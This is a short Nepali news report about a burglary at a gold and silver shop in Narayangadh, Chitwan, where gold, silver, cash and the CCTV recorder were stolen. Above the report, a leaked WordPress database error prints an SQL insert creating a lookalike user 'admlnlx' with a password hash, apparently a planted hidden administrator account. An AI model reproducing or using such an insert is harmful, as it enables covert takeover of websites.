WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BmnkpNuxGyAhF0DNrcmFWSBK2iQuTk1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:37:48', '', 'admlnlx', 'admlnlx')
चितवन,माघ २१-
नारायणगढको मिलनरोडमा रहेको आधुनिक सुनचाँदी पसलमा विहिवार राती चोरी भएको छ ।पसलमा रहेको ४ केसी सुन,साढे ४ केजी चांदी ,नगद ७ लाख चोरी भएको चितवन प्रहरीले जानाकारी दिएको छ । चोरले सिसि क्यामरा रेकर्ड हुने डिभाइस पनि लगेको वताइएको छ ।घटना राती भएपनि विहान ९ वजे मात्र प्रहरीलाई खवर भएको थियो ।घटनाको अनुसन्धान भैरहेको र चोरीमा संलग्नको खोजी भैरहेको प्रहरीले जनाएको छ ।